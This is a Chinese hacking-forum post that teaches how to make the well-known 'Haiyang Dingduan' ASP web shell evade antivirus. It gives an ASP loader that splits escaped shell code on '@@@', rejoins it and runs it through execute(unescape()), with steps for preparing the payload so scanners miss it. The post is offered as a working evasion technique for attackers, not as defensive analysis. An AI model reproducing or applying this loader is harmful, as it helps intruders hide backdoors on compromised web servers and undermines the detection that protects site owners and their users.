首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

利用split函数免杀asp马


http://www.gipsky.com/
大家都知道“海洋顶端”asp木马很有名。但是实际上真正用它的人却不多。主要原因就是由于它太有名,被杀软盯的很紧,特征码也很多,所以做免杀很困难。 前几天,在《黑防》上看到hack214大哥(又是他o(∩_∩)o)的文章《Split函数黑客化,轻松免杀asp木马》(2008年第3期),又是收 获不少,觉得他的思路很好,呵呵。免杀的具体格式我简化了一下,方便使用,嘿嘿。

方法如下:

<B><%

dim a,b,temp,c

a="用@@@分隔开的escape加密后的密文"

b=replace(a,"@@@","零")

c=split(b,"零")

for i=0 to ubound(c)

temp=temp c(i)

next

execute(unescape(temp))

%></B>



'只加密asp代码,html的不能加密

'必须把要加密代码前后的“<%”“%>”去掉

'先用“@@@”把要加密的源代码隔开再用escape加密

'对于这点,我用notepad 打开源代码,然后把“t”(随便什么字母都可以)替换成“t@@@

'完了后把<% %>里的代码放到原来asp程序的位置就可以了。

海洋免杀还要用html变形加密前面的一点html代码(可以到http://www.cha88.cn/在线加密),所以有点麻烦。我这个自己测试的没问题,其实还是有点担心开头html代码的加密。就看时间的考验了。
<< 利用超级兔子获取终端administrator密码
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号